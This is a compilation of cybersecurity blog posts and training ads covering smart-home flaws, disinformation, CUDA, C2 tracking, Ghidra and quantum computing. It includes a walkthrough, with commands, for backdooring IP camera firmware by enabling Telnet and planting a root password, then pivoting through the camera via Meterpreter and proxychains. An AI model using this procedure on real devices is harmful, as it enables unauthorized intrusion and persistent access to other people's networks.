Smart homes are increasingly becoming common in our digital world! These smart home devices have become of the key targets of malicious hackers. This is largely due to their very weak security. In 2025, attacks on connected devices rose 400 percent, with average breach costs hitting $5.4 million
In this three-day class, we will explore and analyze the various security weaknesses of these smart home devices and protocols.
Course Outline
Introduction and Overview of Smart Home Devices
Weak Authentication on Smart Home Devices
RFID and the Smart Home Security
Bluetooth and Bluetooth LE vulnerabilities in the home
Wi-Fi vulnerabilities and how they can be leveraged to takeover all the devices in the home
LoRa vulnerabilities
IP Camera vulnerabilities
Zigbee vulnerabilities
Jamming Wireless Technologies in the Smart Home
How attackers can pivot from an IoT devices in the home to takeover your phone or computer
How to Secure Your Smart Home
This course is part of ourSubscriber Pro training package
Hello world of Hackers Arise, in this post, we delve into the complex world of Russian disinformation campaigns on the internet. As Master OTW clearly established in his interview with Yaniv Hoffman (watch the video below), the disinformation campaign carried out by the high-ranking Russian authorities is not something new. It has been developed for decades, and they have truly become extremely adept at it, especially now with the use of the internet and social media. Throughout the years, they have dedicated themselves to spreading hatred, envy, and resentment worldwide, which we could classify as Psychological Warfare Operations, but taken to the extreme, as they not only aim to misinform or influence to achieve specific strategic targets but also intend to divide and confront the entire world.
However, we do not say this capriciously; there are foundations and information that support our arguments, we also do not intend to hide or minimize the fact that all nation-states carry out this type of operations, but in the case of the Russian authorities, their intention redefines the concept of pure malevolence.
https://www.youtube.com/watch?v=t2P6iADGnpE
With the rise of social media and interconnected platforms, information dissemination has become a powerful tool for shaping public opinion. Russia, among other countries, has been at the forefront of exploiting these channels to advance its strategic goals. This article aims to shed light on the methods, motives, and implications of Russia’s disinformation campaigns while underlining the importance of critical thinking and media literacy in navigating the digital landscape.
Understanding Disinformation:
Disinformation is the dissemination of false or misleading information with the intention to deceive or manipulate the public. Russia has become notorious for employing sophisticated techniques to influence global narratives on a wide range of issues, from political events to social debates and international relations. Understanding the multifaceted nature of disinformation is crucial in recognizing and countering its effects.
The following link leads to a study whose key points I will list below with the aim of understanding the main characteristics of this type of operations carried out by the Russian authorities.
Russia employs an array of methods to propagate disinformation effectively. These include the use of bots and troll farms to flood social media with false narratives, the creation and distribution of deceptive content, and the manipulation of search engine algorithms to amplify biased information. By utilizing these methods, Russia can create an illusion of consensus and spread narratives that align with its geopolitical interests.
“The Russian Federation has engaged in a systematic, international campaign of disinformation, information manipulation and distortion of facts in order to enhance its strategy of destabilisation of its neighbouring countries, the EU and its member states. In particular, disinformation and information manipulationhas repeatedly and consistently targeted European political parties, especially during the election periods, civil society and Russian gender and ethnic minorities, asylum seekers and the functioning of democratic institutions in the EU and its member states.
In order to justify and support its military aggression of Ukraine, the Russian Federation has engaged in continuous and concerted disinformation and information manipulation actions targeted at the EU and neighbouring civil society members, gravely distorting and manipulating facts.” Source (Picture below)
The mass media outlets mentioned above are either state-owned or corporations serving the state. However, Putin does not like independent journalism doing its job, and that’s why he took actions against them. Source Take a look at the amount of budget allocated by the Russian high command for those platforms to deploy disinformation.
Motives Behind the Campaigns:
The motives driving Russia’s disinformation campaigns are diverse and can be linked to political, economic, and security-related goals. Destabilizing rival countries, sowing discord among allies, discrediting political opponents, and undermining democratic processes are some of the key objectives pursued through t
hese campaigns. Understanding these motives is essential in formulating an effective response.If you still don’t believe that they spread hate all over the internet, take a look at these myths whose explanations are debunked in the source we provided.
And what about the Russian troll farm?
Implications and Impact:
The impact of Russian disinformation campaigns is far-reaching. They can polarize societies, erode trust in democratic institutions, and exacerbate existing divisions within nations. In international affairs, disinformation can escalate tensions between countries and influence public opinion on foreign policy matters. Moreover, the erosion of trust in media sources can lead to a decline in accurate information and the rise of echo chambers. Russian officials and pro-Russian media capitalized on the fear and uncertainty caused by the COVID-19 pandemic, actively spreading conspiracy theories. Among these theories, they focused on false U.S. bio-weapon infrastructure claims. One notable example is an article published by New Eastern Outlook on 20th February, available in both Russian and English, alleging that the U.S. deployed a biological weapon against China.
Fighting Back:
Countering Russian disinformation requires a comprehensive approach. Governments, tech companies, and civil society must collaborate to identify and expose false narratives, invest in media literacy programs, and enhance cybersecurity measures to protect against information warfare. Educating the public on critical thinking and fact-checking is a powerful tool in combating the spread of disinformation, but it is also our responsibility as hackers and advocates of freedom within the cyberspace; we must make this responsibility our mission, our duty, to ensure free access to information.
Conclusion:
The internet has opened up new frontiers for information dissemination, but it has also become fertile ground for disinformation campaigns. Russia’s approach to shaping narratives on a global scale requires a vigilant and proactive response from the international community. By fostering media literacy and promoting responsible online behavior, we can safeguard the integrity of information and fortify our societies against the perils of disinformation.
As smart homes become ever more common in our digital world, they have become a favorite target for hackers around the world. We have seen SO many smart home devices compromised and then the hackers use those devices to pivot to other devices connected to the local area network such as phones and laptops.
Smart home devices now include so many devices, such as;
Each of these smart devices has a small CPU, small amount of RAM, and a Linux operating system, most commonly BusyBox, due to its very small size. These systems are very often shipped with little aforethought regarding security. This makes it relatively easy to hack these devices.
In addition, these devices are often connected to your Wi-Fi, Bluetooth, or Zigbee network. Each of these network types are vulnerable to multiple attack vectors making the entire home and the devices therein vulnerable.
To learn more about Smart Home Hacking, consider attending our Smart Home Hacking training, January 13-15.
Here are the most significant security risks documented in recent research and threat reports:
Common Smart Home Vulnerabilities
Weak or Default Credentials
Many smart home devices ship with weak, default, or hardcoded passwords, which attackers can easily guess or find online.
Credential stuffing and password reuse across multiple devices leads to widespread compromise.
Outdated and Unpatched Firmware
A high proportion of smart devices run old firmware with known vulnerabilities and rarely receive updates or security patches, leaving them open to exploitation.
Supply chain vulnerabilities can introduce malware before devices even reach the consumer (such as Badbox 2.0).
Vulnerable Network Services and Open Ports
Devices expose unnecessary or insecure services to the local network or internet (e.g., Telnet, UPnP, poorly secured web interfaces), facilitating remote exploitation.
Automated scanning for open ports is a dominant attack method, accounting for over 93% of blocked events in recent studies.
Poor Encryption and Data Protection
Many smart devices transmit sensitive data (e.g., audio, video, sensor readings) without proper encryption, enabling eavesdropping and privacy breaches.
Weak or flawed cryptographic implementations allow attackers to decrypt captured traffic or manipulate device functionality.
Device Hijacking and Botnets
Attackers can take over smart devices, using them as proxies for further attacks (DDoS, ad fraud, credential theft) or as part of large-scale botnets (Mirai, EchoBot, PUMABOT).
Compromised devices may serve attacks on other systems without user awareness—sometimes even posing physical safety risks (e.g., hijacked locks or thermostats).
Privacy and Data Exposure
Insecure cameras, microphones, and voice assistants can be used for covert surveillance or to steal sensitive data.
Exposed cloud APIs and device “phone home” features can leak data to third parties or attackers.
Weak Access Controls
Poor onboarding, lack of two-factor authentication, flawed pairing mechanisms, and weak authorization checks let attackers gain access to devices or sensitive controls.
Real-World Examples (2025)
Smart TVs, streaming devices, and IP cameras are currently the most exploited categories, often running on Linux/Android with outdated kernels.
Malicious firmware (such as BadBOX) pre-installed on consumer devices has led to huge botnets and residential proxy abuse, sometimes before devices are even plugged in by the end user.
Large-scale privacy violations include attackers publicly streaming home camera footage due to default credentials or unpatched vulnerabilities.
Summary Table
Vulnerability Type
Example Consequence
Default/weak credentials
Easy unauthorized access
Outdated firmware
Exposure to known exploits
Open network services
Remote code execution, botnets
Poor encryption
Data interception, manipulation
Device hijacking/botnets
DDoS, fraud, lateral movement
Weak access controls
Device takeover, privacy breaches
Privacy/data exposure
Surveillance, data theft
Summary
Smart homes are becoming increasingly popular in industrialized countries particularly among higher income households. These smart homes offer the user convenience while offering an enticing target for hackers. If the attacker can compromise even one device within the home, then all of the devices on the home network are at risk!
To learn more about Smart Home Hacking and Security, consider attending our upcoming Smart Home Hacking training in January 2026.
You have likely heard of the company NVIDIA. Not only are the dominant company in computer graphics adapters (if you are gamer, you likely have one) and now, artificial intelligence. In recent weeks, they have become the most valuable company in the world ($5 trillion).
The two primary reasons that Nvidia has become so important to artificial intelligence are:
Nvidia chips can process data in multiple threads, in some cases, thousands of threads. This makes doing complex calculations in parallel possible, making them much faster.
Nvidia created a development environment named CUDA for harnessing the power of these powerful CPU’s. This development environment is a favorite among artificial intelligence, data analytics, and cybersecurity professionals.
Let’s a brief moment to examine this powerful environment.
What is CUDA?
Most computers have two main processors:
CPU (Central Processing Unit): General-purpose, executes instructions sequentially or on a small number of cores. These CPU’s such as Intel and AMD provide the flexibility to run many different applications on your computer.
GPU (Graphics Processing Unit): These GPU’s were originally designed to draw graphics for applications such as games and VR environments. These GPU’s contain hundreds or thousands of small cores that excel at doing the same thing many times in parallel.
CUDA (Compute Unified Device Architecture) is NVIDIA’s framework that lets you take control of the GPU for general computing tasks. In other words, CUDA lets you write code that doesn’t just render graphics—it crunches numbers at massive scale. That’s why it’s a favorite for machine learning, password cracking, and scientific computing.
Why Should Hackers & Developers Care?
CUDA matters as an important tool in your cybersecurity toolkit because:
Speed: A GPU can run password hashes or machine learning models orders of magnitude faster than a CPU.
Parallelism: If you need to test millions of combinations, analyze huge datasets, or simulate workloads, CUDA gives you raw power.
Applications in Hacking: Tools like Hashcat and Pyrit use CUDA to massively accelerate brute-force and dictionary attacks. Security researchers who understand CUDA can customize or write their own GPU-accelerated tools.
The CUDA environment sees the GPU as a device with:
Threads: The smallest execution unit (like a tiny worker).
Blocks: Groups of threads.
Grids: Groups of blocks.
Think of it like this:
A CPU worker can cook one meal at a time.
A GPU is like a kitchen with thousands of cooks—we split the work (threads), organize them into brigades (blocks), and assign the whole team to the job (grid).
Coding With CUDA
CUDA extends C/C++ with some keywords. Here’s the simple workflow:
You write a kernel function (runs on the GPU).
You call it from the host code (the CPU side).
Launch thousands of threads in parallel → GPU executes them fast.
Example skeleton code:
c__global__ void add(int *a, int *b, int *c) {
int idx = threadIdx.x;
c[idx] = a[idx] + b[idx];
}
int main() {
// Allocate memory on host and device// Copy data to GPU// Run kernel with N threads
add<<<1, N>>>(dev_a, dev_b, dev_c);
// Copy results back to host
}
The keywords:
__global__ → A function (kernel) run on the GPU.
threadIdx → Built-in variable identifying which thread you are.
<<<1, N>>> → Tells CUDA to launch 1 block of N threads.
This simple example adds two arrays in parallel. Imagine scaling this to millions of operations at once!
The CUDA Toolchain Setup
If you want to try CUDA make certain you have the following items:
1. an NVIDIA GPU.
2. the CUDA Toolkit (contains compiler nvcc).
3. Write your CUDA programs in C/C++ and compile it with nvcc.
Run and watch your GPU chew through problems.
To install the CUDA toolkit in Kali Linux, simply enter;
kali > sudo apt install nvidia-cuda-toolkit
Next, write your code and compile it with nvcc, such as;
kali > nvcc hackersarise.cu -o hackersarise
Practical Applications of CUDA
CUDA is already excelling at hacking and computing applications such as;
Password cracking (Hashcat, John the Ripper with GPU support).
As a beginner, start with small projects—then explore how to take compute-heavy tasks and offload them to the GPU.
Summary
CUDA is NVIDIA’s way of letting you program GPUs for general-purpose computing. To the hacker or cybersecurity pro, it’s a way to supercharge computation-heavy tasks.
Learn the thread-block-grid model, write simple kernels, and then think: what problems can I solve dramatically faster if run in parallel?
Welcome back, my aspiring SCADA/ICS security engineers!
SCADA/ICS hacking is one of the most important areas of cybersecurity and one of the least understood. SCADA/ICS systems power our entire industrial infrastructure and are critical to the every day functioning of our economy and lives. These systems include;
Electrical generation and transmission
Chemical processing
Oil refineries
Food processing
Pharmaceutical manufacturing
Water and wastewater systems
Cellular and mobile communication systems
Without any of these systems, an economy can be crippled. Hackers-Arise is one of the leaders in SCADA/ICS cybersecurity, and next month we are offering a new class in this discipline, SCADA/ICS Forensics.
If we are to protect these systems, we need to understand how hackers can access these systems and how we can detect their presence and actions.
SCADA/ICS Forensics Training Outline
1. Introduction to ICS/SCADA Systems
Overview of industrial control systems (ICS) and SCADA architecture
Key components: PLCs, RTUs, sensors, actuators, HMIs, data historians
Differences between IT and OT environments
2. ICS/SCADA Protocols and Communications
Common industrial protocols (Modbus, DNP3, OPC, PROFIBUS, etc.)
TCP/IP and fieldbus network topologies
Protocol vulnerabilities and forensic implications
One of the key tasks for those defending a country’s, institution’s or corporation’s assets is to understand what threats exist. This is often referred to as Cyber Threat Intelligence or CTI. It encompasses understanding what the threat actors (hackers and nations) are doing and which are threats to your organization. In that regard, we have a new tool to identify and track command and control servers, malware and botnets using telltale fingerprinting from Shodan and Censys.
Command and Control Servers: History, Development & Tracking
In the fast-changing world of cybersecurity, Command and Control (C2) servers have been crucial. These servers are central to many cyber attacks and play a big role in the ongoing fight between offensive and defensive sides. To appreciate modern tools like C2 Tracker, let’s look back at the history and development of C2 servers.
Early days
The story of C2 servers starts in the early days of the internet, back in the 1990s. Hackers used Internet Relay Chat (IRC) channels as their first basic command centers. Infected computers would connect to these IRC channels, where attackers could send commands directly. The malware on the compromised systems would then carry out these commands.
The following figure shows the Hoaxcalls bot’s C2 communication with its C2 server over IRC.
The Web Era and the Art of Blending In
As detection methods got better, attackers changed their tactics. In the early 2000s, they started using web-based C2 systems. By using HTTP and HTTPS, attackers could hide their C2 traffic as regular web browsing. Since web traffic was everywhere, this method was a clever way to camouflage their malicious activities.
Using basic web servers to manage their command systems also made things simpler for attackers. This period marked a big step up in the sophistication of C2 methods, paving the way for even more advanced techniques.
Decentralization: The Peer-to-Peer Revolution
In the mid-2000s, C2 systems saw a major change with the rise of peer-to-peer (P2P) networks. This shift addressed the weakness of centralized servers, which were easy targets for law enforcement and defensive security teams.
In P2P C2 systems, infected computers talk to each other to spread commands and steal data. This decentralized setup made it much harder to shut down the network. Examples like the Storm botnet and later versions of the Waledac botnet showed how tough this model was to tackle, pushing cybersecurity experts to find new ways to detect and counter these threats.
Machines infected by Storm botnet:
Hiding in Plain Sight: The Social Media and Cloud Era
In the 2010s, the rise of social media and cloud services brought a new shift in C2 tactics. Cyber attackers quickly started using platforms like Twitter, Google Docs, and GitHub for their C2 operations. This made it much harder to spot malicious activity because commands could be hidden in ordinary tweets or documents. Additionally, using major cloud providers made their operations more reliable and resilient.
The Modern C2 Landscape
Today’s C2 systems use advanced evasion techniques to avoid detection. Domain fronting hides malicious traffic behind legitimate, high-reputation websites. Fast flux networks constantly change the IP addresses linked to C2 domains, making it difficult to block them. Some attackers even use steganography to hide commands in images or other harmless-looking files.
One of the latest trends is blockchain-based C2 systems, which use cryptocurrency networks for covert communication. This approach takes advantage of blockchain’s decentralized and anonymous features, creating new challenges for tracking and identifying these threats.
Blockchain transaction diagrams used by Glupteba botnet
The Rise of C2 Tracking Tools
With C2 servers being so crucial in cyber attacks, developing effective tracking tools has become really important. By mapping out how different attackers set up their C2 systems, these tools provide insights into their tactics and capabilities. This helps link attacks to specific groups and track changes in methods over time.
Additionally, this data helps with proactive threat hunting, letting security teams search for signs of C2 communication within their networks and find hidden compromises. On a larger scale, C2 tracking tools offer valuable intelligence for law enforcement and cybersecurity researchers, supporting takedown operations and the creation of new defense strategies.
C2 Tracker
C2 Tracker is a free, community-driven IOC feed that uses Shodan and Censys searches to gather IP addresses of known malware, botnets, a
nd C2 infrastructure.
This feed is available on GitHub and is updated weekly. You can view the results
Add your Shodan API key as the environment variable SHODAN_API_KEY, and set up your Censys credentials with CENSYS_API_ID and CENSYS_API_SECRET.
kali> python3 -m pip install -r requirements.txt
kali> python3 tracker.py
In the data directory, you can see the results:
Let’s take a look at some of the IP addresses of GoPhish servers.
Shodan shows that the default port 3333 is open.
When opened, we can see the authorization form.
Now, let’s move on to our main objective, finding command and control (C2) servers.
For instance, let’s look at the cobalt Strike IP addresses.
We have 827 results!
Each of these IP addresses represents a Cobalt Strike C2 server.
Summary
Cyber Threat Intelligence is crucial to stay ahead of the bad guys. Tools like C2 Tracker are essential to providing you a clear picture of the threat landscape. They help by spotting threats early, aiding in incident response, and supporting overall security efforts. These tools improve our ability to detect, prevent, and handle cyber threats.
In an earlier post, I introduced you to logic. Logic is one of the most under-rated skills in cybersecurity. Without it, you are destined to fail or underperform. In this tutorial, I will attempt to advance your knowledge of logic by introducing you to propositional logic.
Propositional logic is used in AI, cybersecurity, mathematics, and data science but here we want to focus on propositional logic in cybersecurity.
Why Hackers Need Logic
Propositional logic is the backbone of cybersecurity – it’s how firewalls make decisions, how access controls work, and how attackers reverse-engineer your defenses. If you can’t think logically, you’ll get outmaneuvered. Period.
Propositional logic is a branch of logic that studies ways of combining or altering entire statements (called propositions) that have definite truth values—either true or false. It focuses on the logical relationships between these propositions and the rules for forming complex statements (compound propositions) using logical connectives like AND, OR, NOT, IF-THEN, and IF-AND-ONLY-IF.
Let’s break it down like a hacker dissecting a firewall rule.
Core Concepts: The Hacker’s Toolkit
Propositions are statements that are either true (1) or false (0):
P = "Port 22 is open"
Q = "User is admin"
R = "Malicious payload detected"
Logical Operators – Your Attack Vectors:
Operator
Symbol
Real-World Example
NOT
¬
¬P = "Port 22 is closed"
AND
∧
P ∧ Q = "Port 22 open AND user is admin" (Privilege escalation)
OR
∨
P ∨ R = "Port 22 open OR malware detected" (Alert condition)
IMPLIES
→
Q → R = "If user is admin, THEN check for malware" (Access policy)
IFF
↔
P ↔ Q = "Port 22 open IFF user is admin" (Hardened SSH rule)
Truth Tables: Your Exploit Blueprint
Every firewall rule, IDS signature, or access policy boils down to truth tables. Here’s how to weaponize them:
Example: Phishing Detection Rule
(User_clicks_link ∧ Untrusted_domain) → Alert
User_clicks_link
Untrusted_domain
Alert
0
0
0
0
1
0
1
0
0
1
1
1
Attack insight: Evade detection by making either condition false (e.g., hijack trusted domain).
SOC Automation: Code SIEM rules with propositional logic: pythonif (unusual_login_location and not mfa_used) or (impossible_travel): trigger_alert()
The Bottom Line
Propositional logic turns vague security policies into hackable equations. Master truth tables, operator precedence, and real-world mappings – then weaponize them to expose flaws or harden systems.
Remember: In cybersecurity, logic isn’t philosophy – it’s your exploit roadmap.
“The difference between a script kiddie and a pro? The pro knows WHY the rule failed.”
Challenge: Take any firewall rule from your network. Convert it to propositional logic. Find one combination that breaks it. Report back.
So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using AI to fulfill these tasks.
Here are my thoughts on the best approach to landing that first job in cybersecurity!
The best way to get a starting level job in cybersecurity is to combine industry certifications, hands-on skills development, networking, and relevant IT experience or education.
Step #1. Build Foundations and Skills
Study the basics: Networking, operating systems (especially Linux), system administration, scripting (e.g., Python), and security fundamentals. You can gain this background from my books Linux Basics for Hackers, Network Basics for Hackers and, my upcoming, Python Basics for Hackers.
Use free online resources, cybersecurity blogs (such as Hackers-Arise.com), YouTube (David Bombal, Yaniv Hoffman, Network Chuck), for practical, hands-on labs.
Learn basic programming—while not always required, scripting helps with automation and troubleshooting.
Step #2. Get Industry-Recognized Certifications
Start with CompTIA Security+ — the most respected entry-level cert; many entry-level jobs list it as a requirement.
Consider Network+ for networking fundamentals, or more specialized options like SSCP, GCIH.
Certifications signal employers you know security basics and are serious about the field.
Step #3. Pursue Hands-On Experience
Apply for IT/help desk, junior admin, or tech support roles—these are common stepping stones into security.
Take on internships, volunteer for IT/security projects, or contribute to open-source security initiatives. There are multiple open-source projects where you can gain hands-on experience without going through the hiring process. This indicates a strong commitment to cybersecurity and can help get past the “no experience” threshold. Hackers-Arise always has multiple open-source projects in our discord server.
Build a personal “home lab” environment to practice tools and attacks in a legal, safe manner. You can accomplish this inexpensively and without needing an Internet connection using VmWare or VirtualBox.
Step #4. Network and Get Involved
Attend local security meetups, online communities (Reddit, LinkedIn, Twitter), and conferences to build professional connections. This can also include the Hackers-Arise Discord server and community.
Connect with cybersecurity practitioners for insight, mentorship, and potential referrals.
Step #5. Tailor Your Resume and Apply Broadly
Document hands-on skills, home lab work, certifications, and transferable skills from any IT roles.
Customize your resume for each job and be ready to explain your skills and learning journey in interviews.
Explore entry-level roles such as SOC analyst, junior pentester, security technician, and IT support with a security focus.
Summary
Certifications + hands-on learning = fastest path to entry-level roles.
Network and build connections in the security community—it’s often who you know that helps get a foot in the door.
Apply even if you don’t meet every listed requirement: employers want passion, constant learning, and initiative in entry-level candidates.
This blended approach maximizes your chances of breaking into cybersecurity quickly, even without prior professional experience.
There are a number of excellent tools available to use in the field of reverse engineering (see Reverse Engineering, Part 3: Getting Started with IDA Pro and Part 5: Getting Started with OllyDbg ), but now we have an excellent new option known as Ghidra. Ghidra was developed by the US National Security Agency (the US’s leading domestic spy agency and the agency responsible for developing Stuxnet malware and EternalBlue), one of the top espionage agencies in the world.
We first learned of Ghidra in the Wikileaks Vault 7 leak of 2017 and it was released as free and open-source (under the Apache License) software in spring 2019. It is an excellent reverse engineering tool and unlike Ida Pro, it’s free!
Ghidra has nearly all the functionality of Ida Pro without the cost, so if you are starting out in reverse engineering this is probably the software to use.
Due to its effectiveness and attractive price point, I will be using Ghidra to do a series of tutorials in Reverse Engineering Malware here at Hackers-Arise.
I strongly recommend that you read the following tutorials before proceeding here to work with Ghidra:
You can download Ghidra here. Since it is written in Java it is available for nearly every platform including Window, Mac OS and Linux. I’ll be using Windows 10 to demonstrate Ghidra.
As Ghidra is a Java application and requires JDK 11. Make certain that your JDK is up to date and, if not, download the it from Oracle.
Step#2:StartGhidra
Once you have downloaded Ghidra, you can start it by clicking on the .bat file (kind of old school).
Ghidra opens up by displaying this logo for a brief time…
…and then displays this window to start your first project. Projects are similar to folders and can contain multiple files that you are working on.
Click “New Project”.
This opens a window like that below. One of the features of Ghidra is the ability to collaborate on a file or project. In that case, click “Shared Project”. Here we will be working individually on a project, so click “Non-Shared Project”. Then Click Next.
Then, you will be asked for the location and name of your project. In Windows, by default, the project will be placed in your C:User<Name>ghidra directory. I will use that. Then enter your project name. Here I will call my project “MyFirstGhidraProject”.
Next, we need to Import a file. This is the software or malware you want to analyze. Go to File–>ImportFile.
When you select your file, Ghidra will respond with the information below. Click OK.
Ghidra then displays a screen like below with the key information about the file.
Next, this screen pops up with your project and imported file. You can either double-click on the file or “drag and drop” the file to the green Ghidra dragon above it.
Ghidra then begins its work. First, it displays the assembler language of the program in the center Listing window and then asks whether you want to analyze the file. Click “Yes”.
Ghidra will now analyze your file and display the information similar to the four windows below.
These four windows are;
Window#1istheSymbolTree
This window allows you to see the Imports, Exports, Functions, Labels, Classes and Namespaces of the binary.
Window#2istheListingWindow
This window displays the breakdown of the code in assembler language.
Window#3istheDecompilerWindow
The Decompiler enables you to see what the high-level language would likely look like.
Window#4istheDataTypeManagerWindow
The Data Type manager allows you to see all the defined data types.
Now, you are ready to begin analyzing and reverse engineering this file!
Summary
Reverse engineering malware is one of the highest level skill sets within the discipline of cybersecurity and one of the highest paid. Ghidra is an excellent reverse engineering tool capable of running on nearly any platform and priced very attractively (free). In this series on Reverse Engineering, we will be using this tool from the US NSA to reverse engineer multiple pieces of malware beginning with the simple and progressing to the more advanced.
Cryptography is a fundamental skill to cybersecurity!
Cryptography is what keeps our systems and data secure. Without it, all of our information is at risk.
This class to designed to give you a strong background in cryptography further enhancing you knowledge and skill in this key field making you even more valuable in the cybersecurity marketplace.
With quantum computing and quantum cryptography emerging on the near-term horizon, a strong background in cryptography will help your organization prepare and keep your data secure.
If you are a cybersecurity professional or manager, you will want to attend this training!
1. Foundations & Mathematical Background
Probabilistic and computational security
Number theory basics (modular arithmetic, cyclic groups)
Hope you’re enjoying the series so far. Today we are wrapping it up with the final part, focused on modifying camera firmware. This is the most advanced and risky method. It takes time and precision. The biggest challenge is finding firmware that’s suitable for editing and compiling back without breaking the device. Every manufacturer uses specific formats, so if you mess up the structure or file system, the camera won’t boot again. Always proceed carefully.
Case 4: Modifications
This case is similar to the previous one, but we are going deeper. Imagine the camera you found does not have any ports open, like SSH or Telnet – and neither is configurable in the settings. At first glance, it looks like a dead end.
Translation: Обновление прошивки — Firmware update Browse… No file selected. OK
But then you discover it allows firmware updates. Most cameras have this feature available from the web dashboard. That’s your way in. The first step is to get a copy of the firmware. You can find it on third-party firmware archives or from the official manufacturer’s website.
After downloading the firmware, extract it. We found a script file named run.sh inside. When we opened it, we noticed something interesting.
The script had a Telnet launch command that was commented out. We removed the comment to enable Telnet
That solves one part. But we don’t know the Telnet password that is hashed in the passwd file. By default you can find this file in the /etc directory:
Instead of cracking the existing password hash, we generate our own:
kali > openssl passwd -1 password
This gives a new hash string. Replace the existing hash in the /etc/passwd file with the one you just generated. Save the changes.
Now you need to repack the entire directory structure into a new firmware file. Create a new directory and move everything into it:
kali > mkdir firmware
kali > mv etc firmware/
And so on, until you move all other directories.
Recompiling
Our firmware was using the cramfs (Compressed ROM File System). You’ll need to install cramfs tools directly from the Ubuntu repo, as it is not available for Kali.
kali > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb
kali > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb
Once installed, create the new firmware image:kali > mkcramfs firmware firmware-x.cramfs
Rename the file to match the original firmware name to avoid upload issues. We named it firmware to clear the view and make it easier to understand. Go back to the camera dashboard and upload the modified firmware.
Translation: Обновление прошивки — Firmware update Browse… firmware-x.cramfs OK
Wait a few minutes for it to flash and reboot. To check if it’s back online:
kali > ping <camera_ip>
Once the camera responds, connect via Telnet:
kali > telnet <camera_ip> 23
Log in using root and the password you created. If successful, you’ll be inside the system. In our case, the target already had nc installed, which helped a lot.
Open Metasploit on Kali, set up multi/handler with the same payload options, and you’ll get a Meterpreter session. From there, use proxychains with a SOCKS proxy to route your traffic through the compromised camera and access the network behind it. All of these steps were covered in the previous parts.
Conclusion
Modifying camera firmware is the most advanced step in gaining persistent access. It allows you to create a custom backdoor even when all ports are closed. The method gives full control, but it also comes with the highest risk. A small mistake and the camera is dead. But if done right, it’s a powerful tool for deeper infiltration. With this final part, you now have a complete playbook for hacking, accessing, and using Russian cameras as proxies in espionage operations. Good luck on your next hunt.
For decades now, people have been talking with baited breath about quantum computing and its potential to revolutionize computing. So far, no commercial products have appeared. This isn’t dissimilar (I know, a double negative) from what happened to artificial intelligence. For decades, people talked about the promise of AI, and then suddenly, it was upon us and everywhere.
Quantum computing isn’t not upon us yet, but it very close. Maybe 3 years away from hybrid CPU/GPU/QBit machines. That’s not long to prepare for the revolution it will unleash on cybersecurity.
In this post, I want to help you to better understand what quantum computing is and how it will change the discipline we love, cybersecurity. If any of this interests you, we have a Intermediate Cryptography training coming up, October 21-23. We will delve deeper in that class on quantum computing and post quantum cryptography (PQC).
This is a revolution you don’t want to miss!
What is Quantum Computing?
Quantum computing is an advanced field of computer science that uses the principles of quantum mechanics—such as superposition, entanglement, and interference—to process information in ways that are fundamentally different from classical computers.
What is Quantum Mechanics?
Quantum mechanics is the fundamental branch of physics that describes how matter and energy behave at very small scales—typically atoms and subatomic particles. It explains phenomena that classical physics cannot explain, introducing principles like wave-particle duality, superposition, and the uncertainty principle.
Core Principles of Quantum Mechanics
Wave-particle duality: Quantum entities like electrons and photons show both particle and wave characteristics, depending on how they are measured.
Superposition: A quantum system can exist in multiple states simultaneously until measured, at which point it collapses to a definite state.
Uncertainty principle: It is impossible to precisely know both the position and momentum of a particle at the same time (Heisenberg’s Uncertainty Principle).
Quantization: Physical properties such as energy, momentum, and angular momentum can only take discrete values in quantum systems.
Probability and measurement: Quantum mechanics provides probabilities of outcomes, not certainties—only accounting for what is likely to be measured. This is a fundamental difference between quantum mechanics and traditional mechanics and a major challenge of bringing quantum computing to the commercial and practical use.
Key Concepts of Quantum Computing
Qubit: The quantum analogue of the classical bit. Unlike a classical bit, which is always deterministic (either 0 or 1) a qubit can exist in a superposition of both states simultaneously, which allows quantum computers to process many possibilities at once.
Superposition: A principle where a qubit can be both 0 and 1 at the same time. This enables quantum computers to handle much larger computational spaces than classical bits.
Entanglement: A phenomenon where qubits become linked such that the state of one instantly influences the state of another, no matter how far apart they are. This property boosts quantum processing power for certain calculations.
Interference: Quantum algorithms are designed to amplify the probability of correct answers and reduce the probability of incorrect ones using interference patterns.
Why Is Quantum Computing Important?
Quantum computers have the potential to solve complex problems much faster than classical computers, such as factoring large numbers (important in cryptography), simulating molecules for drug discovery, and optimizing large datasets. It is ability to quickly solve factoring very large numbers that is of most interest to us in cybersecurity. Asymmetric encryption is dependent upon the inability of modern, traditional computers to solve these calculations quickly. Quantum computers do not lack this ability and asymmetric encryption algorithms such as RSA are easily broken by quantum computers using Shor’s algorithm.
Limitations and State of the Art
Most quantum computers today are experimental and best suited for specific research or narrow applications but practical applications are on the near horizon. Quantum computing companies such as IONQ have signed contracts with the US Defense Department and US Air Force to offer quantum computing services. This means that state-sponsored actors are likely to have quantum computing capabilities long before the rest of us.
Challenges include qubit stability (decoherence), error rates, and scaling up to large numbers of qubits for practical use. Despite these challenges, industry leaders such as Nvidia’s Jensen Huang, are developing hybrid systems that will integrate CPU’s, GPU’s and Qbits. These will likely be the first commercial systems and are probably only 3 years away.
Summary Table
Classical Computer
Quantum Computer
Bit (0 or 1)
Qubit (0, 1, both via superposition)
Deterministic
Probabilistic
Linear scaling
Exponential scaling with qubits
Limited by classical physics
Exploits quantum mechanics
Quantum computing represents a revolutionary approach for tasks that remain too hard for today’s most powerful classical systems including asymmetric cryptography(RSA, ECC).
How Quantum Computing Threatens Cybersecurity
Breaking Current Encryption: Quantum computers, thanks to algorithms like Shor’s, will be able to factor large numbers and solve mathematical problems that underpin widely used encryption methods such as RSA and ECC at unprecedented speeds. This means that secure communications (HTTPS, VPNs, digital signatures) and much of the world’s encrypted data could be decrypted by quantum adversaries, exposing sensitive information, financial transactions, private communications, and critical infrastructure.
‘Harvest Now, Decrypt Later’ Threat: Malicious actors may harvest encrypted data today, intending to decrypt it in the future when quantum computing power becomes available
Vulnerable Infrastructure: Industries relying on legacy encryption—such as banking, healthcare, and government—are particularly threatened, as data breaches could result in massive regulatory, financial, and reputational harm
Advanced Malware and Attacks: Quantum computing may also enable more advanced malware, AI-driven attacks, and the rapid discovery of vulnerabilities, further evading current detection systems
Post Quantum Cryptography
